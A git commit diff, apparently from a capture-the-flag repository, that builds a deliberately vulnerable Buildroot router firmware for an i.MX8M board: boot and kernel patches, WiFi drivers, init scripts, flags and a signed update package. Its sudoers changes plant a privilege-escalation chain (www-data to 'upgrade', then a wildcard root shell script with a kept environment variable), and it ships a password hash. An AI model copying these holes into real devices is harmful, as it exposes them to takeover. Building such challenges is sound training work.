Added backup of master serve rconfiguration: DHCP, interfaces, iptables

.gitignore

@@ -0,0 +1 @@
+target/

Readme.md

@@ -41,10 +41,10 @@ E' consigliabile trovare almeno due beta tester per la challenge che sperimentin
 Per Debian 10, installare
 
 ```
-sudo apt install -t build-essential libncurses-dev bison flex libssl-dev libelf-dev
+sudo apt install -y build-essential libncurses-dev bison flex libssl-dev libelf-dev wget curl rsync unzip
 ```
 
-Per la cross compilazioen del keygen su ARM installare
+Per la cross compilazione del keygen su ARM installare
 
 ```
 sudo apt install crossbuild-essential-arm64 

build-tgr.sh

@@ -10,11 +10,9 @@
 
 #flag1=$1
 #flag2=$2
-#flag3=$3
 
 flag1="cc{prima_flag}"
 flag2="cc{seconda_flag}"
-flag3="cc{terza_flag}"
 password=`hexdump -n 32 -e '4/4 "%08X"' /dev/urandom`
 
 echo "[+] Starting build script..."
@@ -30,19 +28,19 @@ cp -R conf/* target/overlay # copy target system config files
 cp -R webpanel/* target/overlay/var/www/html # copy the webpanel
 cp -R update/update.sh target/overlay #copy the update script and certificate
 
+echo "[+] Adding firmware"
+mkdir -p target/overlay/lib
+cp -R firmware target/overlay/lib/ # adding binary firmware for wifi driver
+
 echo "[+] Writing flags"
 sed -i "s/##FLAG1##/$flag1/g" target/overlay/var/www/html/includes/config.php
 echo $flag2 > target/overlay/flag
 chmod 444 target/overlay/flag
-mkdir target/overlay/root
-chmod 700 target/overlay/root
-echo $flag3 > target/overlay/root/flag
-chmod 400 target/overlay/root/flag
 
 echo "[+] Building the keygen"
 mkdir -p target/overlay/usr/sbin
 aarch64-linux-gnu-gcc -o target/overlay/usr/sbin/cfgbin keygen/keygen.c -static -lm
-strip target/overlay/usr/sbin/cfgbin
+aarch64-linux-gnu-strip target/overlay/usr/sbin/cfgbin
 
 echo "[+] Generating Update Key"
 mkdir -p target/keys
@@ -50,11 +48,20 @@ openssl genrsa -out target/keys/signingkey.pem 2048
 openssl rsa -in target/keys/signingkey.pem -outform PEM -pubout -out target/keys/signingpub.pem
 cp target/keys/signingpub.pem target/overlay/pub.pem
 
+echo "[+] Generating sample update package"
+mkdir -p home/upgrade
+echo "sample update" > home/upgrade/sample.txt
+tar -cvf update.tar home
+openssl dgst -sha256 -sign target/keys/signingkey.pem -out update.tar.sig update.tar
+cat update.tar > update.tar.cc
+cat update.tar.sig >> update.tar.cc
+mv update.tar.cc target/overlay
+rm -rf home update.tar update.tar.sig
+
 echo "[+] Generating Monitoring SSH Key"
 ssh-keygen -t ecdsa -f target/keys/sshkey -q -N ""
 mkdir -p target/overlay/root/.ssh
 cp target/keys/sshkey target/overlay/root/.ssh/authorized_keys
-chmod -R 600 target/overlay/root/.ssh/
 
 echo "[+] Saving the root password"
 echo $password > target/keys/rootpassword

buildroot/board/freescale/common/imx/genimage.cfg.template_imx8

@@ -0,0 +1,41 @@
+# Minimal SD card image for the Freescale iMX8 boards
+#
+# We mimic the .sdcard Freescale's image format:
+# * the SD card must have 33 kB free space at the beginning,
+# * U-Boot is integrated into imx8-boot-sd.bin and is dumped as is,
+# * a FAT partition at offset 8MB is containing Image and DTB files
+# * a single root filesystem partition is required (ext2, ext3 or ext4)
+#
+
+image boot.vfat {
+  vfat {
+    label = "boot"
+    files = {
+      %FILES%
+    }
+  }
+  size = 64M
+}
+
+image sdcard.img {
+  hdimage {
+  }
+
+  partition imx-boot {
+    in-partition-table = "no"
+    image = "imx8-boot-sd.bin"
+    offset = %IMXOFFSET%
+  }
+
+  partition boot {
+    partition-type = 0xC
+    bootable = "true"
+    image = "boot.vfat"
+    offset = 8M
+  }
+
+  partition rootfs {
+    partition-type = 0x83
+    image = "rootfs.ext2"
+  }
+}

buildroot/board/tiesse/tgr/kernel-patches/1000-imx8mm-Add-imx8mm-tgr-device-tree.patch

@@ -2,16 +2,16 @@ diff --git arch/arm64/boot/dts/freescale/Makefile arch/arm64/boot/dts/freescale/
 index da7ede2f5744..2a0a0f56b9a8 100644
 --- linux-imx/arch/arm64/boot/dts/freescale/Makefile
 +++ linux-imx/arch/arm64/boot/dts/freescale/Makefile
-@@ -118,7 +118,8 @@
+@@ -116,7 +116,8 @@ dtb-$(CONFIG_ARCH_FSL_IMX8MQ) += fsl-imx8mq-ddr3l-arm2.dtb \
  				 fsl-imx8mq-evk-inmate.dtb \
  				 fsl-imx8mq-evk-dp.dtb \
  				 fsl-imx8mq-evk-edp.dtb
 -dtb-$(CONFIG_ARCH_FSL_IMX8MM) += fsl-imx8mm-evk.dtb \
 +dtb-$(CONFIG_ARCH_FSL_IMX8MM) += fsl-imx8mm-tgr.dtb \
 +				 fsl-imx8mm-evk.dtb \
-				 fsl-imx8mm-evk-drm.dtb \
  				 fsl-imx8mm-evk-ak4497.dtb \
  				 fsl-imx8mm-evk-m4.dtb \
+ 				 fsl-imx8mm-evk-ak5558.dtb \
 diff --git arch/arm64/boot/dts/freescale/fsl-imx8mm-tgr.dts arch/arm64/boot/dts/freescale/fsl-imx8mm-tgr.dts
 new file mode 100755
 index 000000000000..411de1c8c620

buildroot/board/tiesse/tgr/kernel-patches/1002-imx8mm-Add-PCA9450-PMIC-support.patch

@@ -21,14 +21,11 @@ diff --git drivers/mfd/Makefile drivers/mfd/Makefile
 index c6755df735ba..962dcc88d99c 100644
 --- linux-imx/drivers/mfd/Makefile
 +++ linux-imx/drivers/mfd/Makefile
-@@ -241,6 +241,7 @@
- obj-$(CONFIG_MFD_STM32_LPTIMER)	+= stm32-lptimer.o
+@@ -232,3 +232,4 @@ obj-$(CONFIG_MFD_STM32_LPTIMER)	+= stm32-lptimer.o
  obj-$(CONFIG_MFD_STM32_TIMERS) 	+= stm32-timers.o
  obj-$(CONFIG_MFD_MXS_LRADC)     += mxs-lradc.o
+ obj-$(CONFIG_MFD_BD71837)       += bd71837.o
 +obj-$(CONFIG_MFD_PCA9450)	+= pca9450.o
- obj-$(CONFIG_MFD_SC27XX_PMIC)	+= sprd-sc27xx-spi.o
- obj-$(CONFIG_RAVE_SP_CORE)	+= rave-sp.o
- obj-$(CONFIG_MFD_ROHM_BD718XX)	+= rohm-bd718x7.o
 diff --git drivers/mfd/pca9450.c drivers/mfd/pca9450.c
 new file mode 100644
 index 000000000000..85ce6e3eef68
@@ -359,14 +356,14 @@ diff --git drivers/regulator/Makefile drivers/regulator/Makefile
 index 1bddbefbc8e7..0072ad5666f8 100644
 --- linux-imx/drivers/regulator/Makefile
 +++ linux-imx/drivers/regulator/Makefile
-@@ -131,6 +131,7 @@
- obj-$(CONFIG_REGULATOR_WM8350) += wm8350-regulator.o
+@@ -126,6 +126,7 @@ obj-$(CONFIG_REGULATOR_WM8350) += wm8350-regulator.o
  obj-$(CONFIG_REGULATOR_WM8400) += wm8400-regulator.o
  obj-$(CONFIG_REGULATOR_WM8994) += wm8994-regulator.o
+ obj-$(CONFIG_REGULATOR_BD71837) += bd71837-regulator.o
 +obj-$(CONFIG_REGULATOR_PCA9450) += pca9450-regulator.o
-
- obj-$(CONFIG_MFD_SC27XX_PMIC)   += sprd-sc27xx-spi.o
-
+ 
+ 
+ ccflags-$(CONFIG_REGULATOR_DEBUG) += -DDEBUG
 diff --git drivers/regulator/pca9450-regulator.c drivers/regulator/pca9450-regulator.c
 new file mode 100644
 index 000000000000..6b9ce8f34e0e

buildroot/board/tiesse/tgr/linux.config

@@ -314,6 +314,7 @@ CONFIG_USB_NET_QMI_WWAN=m
 CONFIG_BRCMFMAC=m
 CONFIG_BRCMFMAC_PCIE=y
 CONFIG_HOSTAP=y
+CONFIG_RFKILL=y
 CONFIG_RTL_CARDS=m
 # CONFIG_WLAN_VENDOR_TI is not set
 CONFIG_XEN_NETDEV_BACKEND=m
@@ -868,4 +869,3 @@ CONFIG_CRYPTO_AES_ARM64_CE_CCM=y
 CONFIG_CRYPTO_AES_ARM64_CE_BLK=y
 CONFIG_CRYPTO_CHACHA20_NEON=m
 CONFIG_CRYPTO_AES_ARM64_BS=m
-

buildroot/board/tiesse/tgr/permissions.config

@@ -0,0 +1,7 @@
+/var/www/html/index.php f 755 upgrade upgrade - - - - - 
+/var/www/html/update.php f 755 upgrade upgrade - - - - -
+/var/www/html/utils.php f 755 upgrade upgrade - - - - - 
+/update.sh f 755 root root - - - - -
+/root/ d 700 root root - - - - - 
+/root/.ssh/ d 700 root root - - - - -
+/root/.ssh/authorized_keys f 644 root root - - - - -

buildroot/board/tiesse/tgr/uboot-patches/0000-Add-imx8mm-tgr-support.patch

@@ -1,8 +1,22 @@
+Index: u-boot-imx/arch/arm/dts/Makefile
+===================================================================
+--- u-boot-imx.orig/arch/arm/dts/Makefile
++++ u-boot-imx/arch/arm/dts/Makefile
+@@ -468,7 +468,8 @@ dtb-$(CONFIG_ARCH_IMX8M) += fsl-imx8mq-e
+ 		fsl-imx8mm-ddr3l-val.dtb \
+ 		fsl-imx8mm-ddr4-evk.dtb \
+ 		fsl-imx8mm-ddr4-val.dtb \
+-		fsl-imx8mm-evk.dtb
++		fsl-imx8mm-evk.dtb \
++		fsl-imx8mm-tgr.dtb
+ 
+ dtb-$(CONFIG_ARCH_IMX8) += fsl-imx8dx-17x17-val.dtb \
+ 		fsl-imx8qm-ddr4-arm2.dtb \
 Index: u-boot-imx/arch/arm/dts/fsl-imx8mm-tgr.dts
 ===================================================================
 --- /dev/null
 +++ u-boot-imx/arch/arm/dts/fsl-imx8mm-tgr.dts
-@@ -0,0 +1,439 @@
+@@ -0,0 +1,466 @@
 +/*
 + * Copyright 2018 NXP
 + *
@@ -75,6 +89,18 @@ Index: u-boot-imx/arch/arm/dts/fsl-imx8mm-tgr.dts
 +			>;
 +		};
 +
++		pinctrl_flexspi0: flexspi0grp {
++			fsl,pins = <
++				MX8MM_IOMUXC_NAND_ALE_QSPI_A_SCLK 0x1c4
++				MX8MM_IOMUXC_NAND_CE0_B_QSPI_A_SS0_B 0x84
++
++				MX8MM_IOMUXC_NAND_DATA00_QSPI_A_DATA0 0x84
++				MX8MM_IOMUXC_NAND_DATA01_QSPI_A_DATA1 0x84
++				MX8MM_IOMUXC_NAND_DATA02_QSPI_A_DATA2 0x84
++				MX8MM_IOMUXC_NAND_DATA03_QSPI_A_DATA3 0x84
++			>;
++		};
++
 +		pinctrl_i2c1: i2c1grp {
 +			fsl,pins = <
 +				MX8MM_IOMUXC_I2C1_SCL_I2C1_SCL			0x400001c3
@@ -378,6 +404,21 @@ Index: u-boot-imx/arch/arm/dts/fsl-imx8mm-tgr.dts
 +	status = "okay";
 +};
 +
++&flexspi0 {
++	pinctrl-names = "default";
++	pinctrl-0 = <&pinctrl_flexspi0>;
++	status = "okay";
++
++	flash0: n25q256a@0 {
++		reg = <0>;
++		#address-cells = <1>;
++		#size-cells = <1>;
++		compatible = "spi-flash";
++		spi-max-frequency = <29000000>;
++		spi-nor,ddr-quad-read-dummy = <8>;
++	};
++};
++
 +&fec1 {
 +	pinctrl-names = "default";
 +	pinctrl-0 = <&pinctrl_fec1>;
@@ -518,7 +559,7 @@ Index: u-boot-imx/board/tiesse/tgr/ddr4_timing.c
 +#include <linux/kernel.h>
 +#include <common.h>
 +#include <asm/arch/ddr.h>
-+#include <asm/arch-imx8m/ddr.h>
++#include <asm/arch/imx8m_ddr.h>
 +
 +struct dram_cfg_param ddr4_ddrc_cfg[] = {
 +	/* Start to config, default 2400mbps */
@@ -2005,7 +2046,7 @@ Index: u-boot-imx/board/tiesse/tgr/lpddr4_timing.c
 + */
 +
 +#include <linux/kernel.h>
-+#include <asm/arch-imx8m/ddr.h>
++#include <asm/arch/imx8m_ddr.h>
 +
 +struct dram_cfg_param ddr_ddrc_cfg[] = {
 +	/* Initialize DDRC registers */
@@ -3877,7 +3918,7 @@ Index: u-boot-imx/board/tiesse/tgr/spl.c
 +#include <asm/mach-imx/mxc_i2c.h>
 +#include <fsl_esdhc.h>
 +#include <mmc.h>
-+#include <asm/arch-imx8m/ddr.h>
++#include <asm/arch/imx8m_ddr.h>
 +
 +DECLARE_GLOBAL_DATA_PTR;
 +
@@ -4462,7 +4503,7 @@ Index: u-boot-imx/include/configs/tgr.h
 ===================================================================
 --- /dev/null
 +++ u-boot-imx/include/configs/tgr.h
-@@ -0,0 +1,361 @@
+@@ -0,0 +1,357 @@
 +/*
 + * Copyright 2018 NXP
 + *
@@ -4616,8 +4657,8 @@ Index: u-boot-imx/include/configs/tgr.h
 +                "root=ubi0:nandrootfs rootfstype=ubifs "                     \
 +                MFG_NAND_PARTITION \
 +                "\0" \
-+	"bootcmd=nand read ${loadaddr} 0x5000000 0x2000000;"\
-+		"nand read ${fdt_addr} 0x7000000 0x100000;"\
++	"bootcmd=fatload mmc 1:1 ${fdt_addr} fsl-imx8mm-tgr.dtb;"\
++		"fatload mmc 1:1 ${loadaddr} Image;"\
 +		"booti ${loadaddr} - ${fdt_addr}"
 +
 +#else
@@ -4640,13 +4681,9 @@ Index: u-boot-imx/include/configs/tgr.h
 +	"mmcautodetect=yes\0"
 +
 +#define CONFIG_BOOTCOMMAND \
-+	   	"mmc dev ${mmcdev}; " \
-+		"if mmc rescan; then " \
-+			"ext4load mmc 1:2 ${loadaddr} boot/Image; " \
-+			"ext4load mmc 1:2 ${fdt_addr} usr/lib/linux-image-4.14.98-tgr/freescale/fsl-imx8mm-tgr.dtb; " \
-+			"ext4load mmc 1:2 ${initrd_addr} boot/initramfs.uImage; " \
-+			"booti ${loadaddr} ${initrd_addr} ${fdt_addr}; " \
-+		"else echo Cannot boot from emmc; fi"
++	   	"fatload mmc 1:1 ${fdt_addr} fsl-imx8mm-tgr.dtb;" \
++		"fatload mmc 1:1 ${loadaddr} Image;" \
++		"booti ${loadaddr} - ${fdt_addr}; "
 +#endif
 +
 +/* Link Definitions */
@@ -4849,9 +4886,9 @@ Index: u-boot-imx/configs/imx8mm_tgr_defconfig
 +CONFIG_CMD_EXT4_WRITE=y
 +CONFIG_CMD_FAT=y
 +CONFIG_DEFAULT_DEVICE_TREE="fsl-imx8mm-tgr"
-+CONFIG_DEFAULT_FDT_FILE="fsl-imx8mm-tgr.dtb"
++CONFIG_DEFAULT_FDT_FILE="fsl-imx8mm-tgr"
 +CONFIG_ENV_IS_IN_MMC=y
-+#CONFIG_CMD_SF=y
++CONFIG_CMD_SF=y
 +CONFIG_CMD_I2C=y
 +CONFIG_CMD_GPIO=y
 +CONFIG_CMD_CACHE=y

buildroot/board/tiesse/tgr/uboot-patches/0001-Fix-config-path.patch

@@ -1,11 +0,0 @@
---- u-boot-imx/arch/arm/mach-imx/spl_sd.cfg
-+++ u-boot-imx/arch/arm/mach-imx/spl_sd.cfg	2020-09-09 14:32:31.752361831 +0200
-@@ -4,7 +4,7 @@
-  */
- 
- #define __ASSEMBLY__
--#include <config.h>
-+#include "../include/asm/config.h"
- 
- IMAGE_VERSION	2
- BOOT_FROM	sd

buildroot/board/tiesse/tgr/uboot-patches/0002-Add-dts-to-makefile.patch

@@ -1,12 +0,0 @@
-Index: u-boot-imx/arch/arm/dts/Makefile
-===================================================================
---- u-boot-imx.orig/arch/arm/dts/Makefile
-+++ u-boot-imx/arch/arm/dts/Makefile
-@@ -630,6 +630,7 @@
- 		fsl-imx8mq-ddr3l-arm2.dtb \
- 		fsl-imx8mq-ddr4-arm2.dtb \
- 		fsl-imx8mm-evk.dtb \
-+		fsl-imx8mm-tgr.dtb \
- 		fsl-imx8mm-ddr3l-val.dtb \
- 		fsl-imx8mm-ddr4-evk.dtb \
- 		fsl-imx8mm-ddr4-val.dtb \

buildroot/board/tiesse/tgr/users.config

@@ -0,0 +1 @@
+upgrade -1 upgrade -1 $1$.siVnLGd$z5FlFeSii/ily9wng5lxS/ /home/upgrade /bin/sh - 

buildroot/configs/tiesse_tgr_defconfig

@@ -1,15 +1,15 @@
 BR2_aarch64=y
 BR2_ARM_FPU_VFPV3=y
-BR2_PACKAGE_HOST_LINUX_HEADERS_CUSTOM_4_19=y
+BR2_PACKAGE_HOST_LINUX_HEADERS_CUSTOM_4_14=y
 BR2_TARGET_GENERIC_GETTY_PORT="ttymxc1"
 BR2_ROOTFS_POST_IMAGE_SCRIPT="board/freescale/common/imx/imx8-bootloader-prepare.sh board/freescale/common/imx/post-image.sh"
 BR2_ROOTFS_POST_SCRIPT_ARGS="${UBOOT_DIR}/arch/arm/dts/fsl-imx8mm-evk.dtb"
 BR2_LINUX_KERNEL=y
 BR2_LINUX_KERNEL_CUSTOM_GIT=y
 BR2_LINUX_KERNEL_CUSTOM_REPO_URL="https://source.codeaurora.org/external/imx/linux-imx"
-BR2_LINUX_KERNEL_CUSTOM_REPO_VERSION="rel_imx_4.19.35_1.1.0"
+BR2_LINUX_KERNEL_CUSTOM_REPO_VERSION="imx_4.14.98_2.0.0_ga"
 BR2_LINUX_KERNEL_DTS_SUPPORT=y
-BR2_LINUX_KERNEL_INTREE_DTS_NAME="freescale/fsl-imx8mm-tgr.dtb"
+BR2_LINUX_KERNEL_INTREE_DTS_NAME="freescale/fsl-imx8mm-tgr"
 BR2_LINUX_KERNEL_NEEDS_HOST_OPENSSL=y
 BR2_LINUX_KERNEL_PATCH="board/tiesse/tgr/kernel-patches/"
 BR2_LINUX_KERNEL_USE_CUSTOM_CONFIG=y
@@ -30,7 +30,7 @@ BR2_TARGET_UBOOT=y
 BR2_TARGET_UBOOT_BUILD_SYSTEM_KCONFIG=y
 BR2_TARGET_UBOOT_CUSTOM_GIT=y
 BR2_TARGET_UBOOT_CUSTOM_REPO_URL="https://source.codeaurora.org/external/imx/uboot-imx"
-BR2_TARGET_UBOOT_CUSTOM_REPO_VERSION="rel_imx_4.19.35_1.1.0"
+BR2_TARGET_UBOOT_CUSTOM_REPO_VERSION="imx_v2018.03_4.14.98_2.0.0_ga"
 BR2_TARGET_UBOOT_BOARD_DEFCONFIG="imx8mm_tgr"
 BR2_TARGET_UBOOT_NEEDS_DTC=y
 BR2_TARGET_UBOOT_FORMAT_CUSTOM=y
@@ -43,17 +43,20 @@ BR2_PACKAGE_HOST_IMX_MKIMAGE=y
 BR2_PACKAGE_HOST_MTOOLS=y
 BR2_PACKAGE_HOST_UBOOT_TOOLS=y
 BR2_PACKAGE_HOST_UBOOT_TOOLS_FIT_SUPPORT=y
-
+BR2_PACKAGE_BUSYBOX_CONFIG="board/tiesse/tgr/busybox.config"
 BR2_GLOBAL_PATCH_DIR="board/tiesse/tgr/packages-patches/"
 BR2_RELRO_FULL=y
-BR2_PACKAGE_HOST_LINUX_HEADERS_CUSTOM_4_19=y
-BR2_TARGET_GENERIC_HOSTNAME="cros"
+BR2_TARGET_GENERIC_HOSTNAME="ccos"
 BR2_TARGET_GENERIC_ISSUE="1337 Linux"
 BR2_TARGET_ENABLE_ROOT_LOGIN=y
 BR2_TARGET_GENERIC_ROOT_PASSWD="###ROOTPASSWORD###"
+BR2_ROOTFS_USERS_TABLES="board/tiesse/tgr/users.config"
+BR2_ROOTFS_DEVICE_TABLE="board/tiesse/tgr/permissions.config" 
 BR2_SYSTEM_DHCP="eth0"
 BR2_ROOTFS_OVERLAY="../overlay"
+BRW_PACKAGE_QCACLD=Y
 BR2_PACKAGE_BUSYBOX_SHOW_OTHERS=y
+BR2_PACKAGE_RNG_TOOLS=y
 BR2_PACKAGE_PHP=y
 BR2_PACKAGE_PHP_SAPI_FPM=y
 # BR2_PACKAGE_PHP_EXT_SESSION is not set
@@ -105,3 +108,9 @@ BR2_PACKAGE_NGINX=y
 # BR2_PACKAGE_NGINX_HTTP_UPSTREAM_KEEPALIVE_MODULE is not set
 BR2_PACKAGE_WIRELESS_REGDB=y
 BR2_PACKAGE_SUDO=y
+BR2_PACKAGE_WIREGUARD_LINUX_COMPAT=y
+BR2_PACKAGE_WIREGUARD_TOOLS=y
+# BR2_PACKAGE_WIREGUARD is not set
+BR2_PACKAGE_WPA_SUPPLICANT=y
+BR2_PACKAGE_WPA_SUPPLICANT_CLI=y
+BR2_PACKAGE_WPA_SUPPLICANT_PASSPHRASE=y

buildroot/package/qcacld/Config.in

@@ -0,0 +1,4 @@
+config BR2_PACKAGE_QCACLD
+       bool "qcacld"
+       help
+               QCACLD kernel driver.

buildroot/package/qcacld/qcacld.mk

@@ -0,0 +1,30 @@
+################################################################################
+#
+# qcacld
+#
+################################################################################
+
+QCACLD_VERSION = IMX_CNSS.LEA.NRT_2.0
+QCACLD_SITE = https://source.codeaurora.org/external/imx/qcacld-2.0-imx
+QCACLD_SITE_METHOD = git
+QCACLD_LICENSE = ISC
+QCACLD_FILES = COPYING
+QCACLD_MODULE_MAKE_OPTS = \
+        CONFIG_CFG80211_INTERNAL_REGDB=y \
+        CONFIG_HDD_WLAN_WAIT_TIME=10000 \
+	CONFIG_LINUX_QCMBR=y \
+	CONFIG_NON_QC_PLATFORM=y \
+	CONFIG_PMF_SUPPORT=y \
+	TARGET_BUILD_VARIANT=user \
+	CONFIG_ROME_IF=pci \
+	CONFIG_WLAN_FEATURE_11W=y \
+	CONFIG_WLAN_FEATURE_FILS=y \
+	CONFIG_WLAN_WAPI_MODE_11AC_DISABLE=y \
+	MODNAME=qca6174
+
+define KERNEL_MODULE_BUILD_CMDS
+        $(MAKE) -C '$(@D)' KERNEL_SRC='$(LINUX_DIR)' CC='$(TARGET_CC)' LD='$(TARGET_LD)' modules
+endef
+
+$(eval $(kernel-module))
+$(eval $(generic-package))

conf/etc/dhcp/dhcpd.conf

@@ -1,5 +1,6 @@
 default-lease-time 600;
 max-lease-time 14400;
+#option domain-name-servers 1.1.1.1; 
 option subnet-mask 255.255.255.0;
 option broadcast-address 192.168.77.255;
 

conf/etc/hostapd.conf

@@ -1,4 +1,4 @@
-interface=wlan0
+interface=ap0
 hw_mode=g
 channel=1
 wmm_enabled=1

conf/etc/init.d/S02modules

@@ -0,0 +1,15 @@
+#!/bin/sh
+
+case "$1" in
+        start)
+		printf "Loading kernel modules: "
+		/sbin/modprobe qca6174
+		/sbin/modprobe wireguard
+		[ $? = 0 ] && echo "OK" || echo "FAIL"
+                ;;
+        *)
+                echo "Usage: $0 {start}"
+                exit 1
+esac
+
+exit 0

conf/etc/init.d/S05wlan-interfaces

@@ -0,0 +1,16 @@
+#!/bin/sh
+
+case "$1" in
+        start)
+                printf "Starting wireless device: "
+		iw dev wlan0 del
+		iw phy phy0 interface add ap0 type __ap
+		iw phy phy0 interface add client0 type station	
+                [ $? = 0 ] && echo "OK" || echo "FAIL"
+                ;;
+        *)
+                echo "Usage: $0 {start}"
+                exit 1
+esac
+
+exit 0

conf/etc/init.d/S22waitrng

@@ -0,0 +1,18 @@
+#!/bin/sh
+
+case "$1" in
+        start)
+		status=`cat /proc/sys/kernel/random/entropy_avail`
+		printf "Waiting for enough entropy: "
+		while [ $status -lt 200 ]; do  
+        		sleep 2                                           
+        		status=`cat /proc/sys/kernel/random/entropy_avail`
+		done
+		echo "OK"
+                ;;
+        *)
+                echo "Usage: $0 {start}"
+                exit 1
+esac
+
+exit 0

conf/etc/init.d/S23cfgbin

@@ -11,6 +11,7 @@ case "$1" in
                 WPA=`cat /etc/wpa`
                 sed -i "s/{{SSID}}/$SSID/g" /etc/hostapd.conf
                 sed -i "s/{{WPA}}/$WPA/g" /etc/hostapd.conf
+		echo "OK"
                 ;;
         *)
                 echo "Usage: $0 {start}"

conf/etc/init.d/S80dhcp-server

@@ -3,7 +3,7 @@
 # $Id: dhcp3-server.init.d,v 1.4 2003/07/13 19:12:41 mdz Exp $
 #
 
-INTERFACES="wlan0"
+INTERFACES="ap0"
 OPTIONS=""
 
 NAME="dhcpd"

conf/etc/network/interfaces

@@ -3,8 +3,14 @@ iface lo inet loopback
 
 auto eth0
     iface eth0 inet dhcp
+    pre-up sleep 20
 
-auto wlan0
-iface wlan0 inet static
+auto ap0
+    iface ap0 inet static
     address 192.168.77.1
     netmask 255.255.255.0
+
+auto client0
+    iface client0 inet manual
+    pre-up ifconfig $IFACE up
+    post-down ifconfig $IFACE down 

conf/etc/sudoers

@@ -1,4 +1,5 @@
 Defaults	env_reset
+Defaults	env_keep = "key"
 Defaults	mail_badpass
 Defaults	secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
 Defaults	logfile="/var/log/sudo.log"
@@ -8,4 +9,5 @@ Defaults	passwd_tries=3
 Defaults	insults
 Defaults	log_input,log_output
 
-www-data ALL=(root) NOPASSWD: /bin/sh /update.sh
+www-data ALL=(upgrade) NOPASSWD: /bin/sh /update.sh
+upgrade	 ALL=(root) NOPASSWD: /usr/sbin/iw client0 scan, /usr/sbin/iw client0 link, /bin/cat /etc/wpa_supplicant.conf, /bin/sh /wifi/connect.sh *, /bin/sh /wifi/disconnect.sh 

conf/lib/modules/4.14.98/modules.dep

@@ -0,0 +1,190 @@
+kernel/arch/arm64/crypto/crct10dif-ce.ko:
+kernel/arch/arm64/crypto/crc32-ce.ko:
+kernel/arch/arm64/crypto/aes-neon-blk.ko:
+kernel/arch/arm64/crypto/sha512-arm64.ko:
+kernel/arch/arm64/crypto/chacha20-neon.ko:
+kernel/arch/arm64/crypto/aes-neon-bs.ko: kernel/arch/arm64/crypto/aes-neon-blk.ko
+kernel/fs/nfs/flexfilelayout/nfs_layout_flexfiles.ko:
+kernel/fs/fuse/fuse.ko:
+kernel/fs/fuse/cuse.ko: kernel/fs/fuse/fuse.ko
+kernel/fs/overlayfs/overlay.ko:
+kernel/fs/btrfs/btrfs.ko: kernel/crypto/xor.ko kernel/lib/zstd/zstd_decompress.ko kernel/lib/zstd/zstd_compress.ko kernel/lib/xxhash.ko kernel/lib/raid6/raid6_pq.ko
+kernel/crypto/crypto_engine.ko:
+kernel/crypto/tcrypt.ko:
+kernel/crypto/xor.ko:
+kernel/drivers/phy/rockchip/phy-rockchip-pcie.ko:
+kernel/drivers/pwm/pwm-bcm2835.ko:
+kernel/drivers/pwm/pwm-cros-ec.ko:
+kernel/drivers/pwm/pwm-meson.ko:
+kernel/drivers/pwm/pwm-tegra.ko:
+kernel/drivers/pci/host/pcie-rockchip.ko:
+kernel/drivers/video/backlight/lcd.ko:
+kernel/drivers/video/backlight/generic_bl.ko:
+kernel/drivers/video/backlight/lp855x_bl.ko:
+kernel/drivers/dma/bcm-sba-raid.ko: kernel/lib/raid6/raid6_pq.ko
+kernel/drivers/dma/bcm2835-dma.ko:
+kernel/drivers/soc/qcom/mdt_loader.ko:
+kernel/drivers/gpu/drm/i2c/ch7006.ko:
+kernel/drivers/gpu/drm/i2c/sil164.ko:
+kernel/drivers/gpu/drm/bridge/analogix/analogix_dp.ko:
+kernel/drivers/gpu/drm/hisilicon/kirin/kirin-drm.ko:
+kernel/drivers/gpu/drm/hisilicon/kirin/dw_drm_dsi.ko:
+kernel/drivers/gpu/drm/ttm/ttm.ko:
+kernel/drivers/gpu/drm/vc4/vc4.ko:
+kernel/drivers/gpu/drm/nouveau/nouveau.ko: kernel/drivers/gpu/drm/ttm/ttm.ko
+kernel/drivers/gpu/drm/exynos/exynosdrm.ko:
+kernel/drivers/gpu/drm/rockchip/rockchipdrm.ko: kernel/drivers/gpu/drm/bridge/analogix/analogix_dp.ko
+kernel/drivers/gpu/drm/rcar-du/rcar-du-drm.ko: kernel/drivers/media/platform/vsp1/vsp1.ko kernel/drivers/media/platform/rcar-fcp.ko
+kernel/drivers/gpu/drm/msm/msm.ko: kernel/drivers/soc/qcom/mdt_loader.ko
+kernel/drivers/gpu/drm/tegra/tegra-drm.ko: kernel/drivers/gpu/host1x/host1x.ko
+kernel/drivers/gpu/drm/meson/meson-drm.ko:
+kernel/drivers/gpu/drm/meson/meson_dw_hdmi.ko: kernel/drivers/gpu/drm/meson/meson-drm.ko
+kernel/drivers/gpu/host1x/host1x.ko:
+kernel/drivers/block/nbd.ko:
+kernel/drivers/misc/eeprom/at25.ko:
+kernel/drivers/mfd/exynos-lpass.ko:
+kernel/drivers/nvme/host/nvme-core.ko:
+kernel/drivers/nvme/host/nvme.ko: kernel/drivers/nvme/host/nvme-core.ko
+kernel/drivers/spi/spi-bcm2835.ko:
+kernel/drivers/spi/spi-bcm2835aux.ko:
+kernel/drivers/spi/spi-meson-spicc.ko:
+kernel/drivers/spi/spi-meson-spifc.ko:
+kernel/drivers/net/phy/marvell.ko:
+kernel/drivers/net/phy/meson-gxl.ko:
+kernel/drivers/net/phy/realtek.ko:
+kernel/drivers/net/ethernet/qualcomm/emac/qcom-emac.ko:
+kernel/drivers/net/ethernet/stmicro/stmmac/stmmac.ko:
+kernel/drivers/net/ethernet/stmicro/stmmac/stmmac-platform.ko: kernel/drivers/net/ethernet/stmicro/stmmac/stmmac.ko
+kernel/drivers/net/ethernet/stmicro/stmmac/dwmac-ipq806x.ko: kernel/drivers/net/ethernet/stmicro/stmmac/stmmac-platform.ko kernel/drivers/net/ethernet/stmicro/stmmac/stmmac.ko
+kernel/drivers/net/ethernet/stmicro/stmmac/dwmac-meson.ko: kernel/drivers/net/ethernet/stmicro/stmmac/stmmac-platform.ko kernel/drivers/net/ethernet/stmicro/stmmac/stmmac.ko
+kernel/drivers/net/ethernet/stmicro/stmmac/dwmac-meson8b.ko: kernel/drivers/net/ethernet/stmicro/stmmac/stmmac-platform.ko kernel/drivers/net/ethernet/stmicro/stmmac/stmmac.ko
+kernel/drivers/net/ethernet/stmicro/stmmac/dwmac-rk.ko: kernel/drivers/net/ethernet/stmicro/stmmac/stmmac-platform.ko kernel/drivers/net/ethernet/stmicro/stmmac/stmmac.ko
+kernel/drivers/net/ethernet/stmicro/stmmac/dwmac-sunxi.ko: kernel/drivers/net/ethernet/stmicro/stmmac/stmmac-platform.ko kernel/drivers/net/ethernet/stmicro/stmmac/stmmac.ko
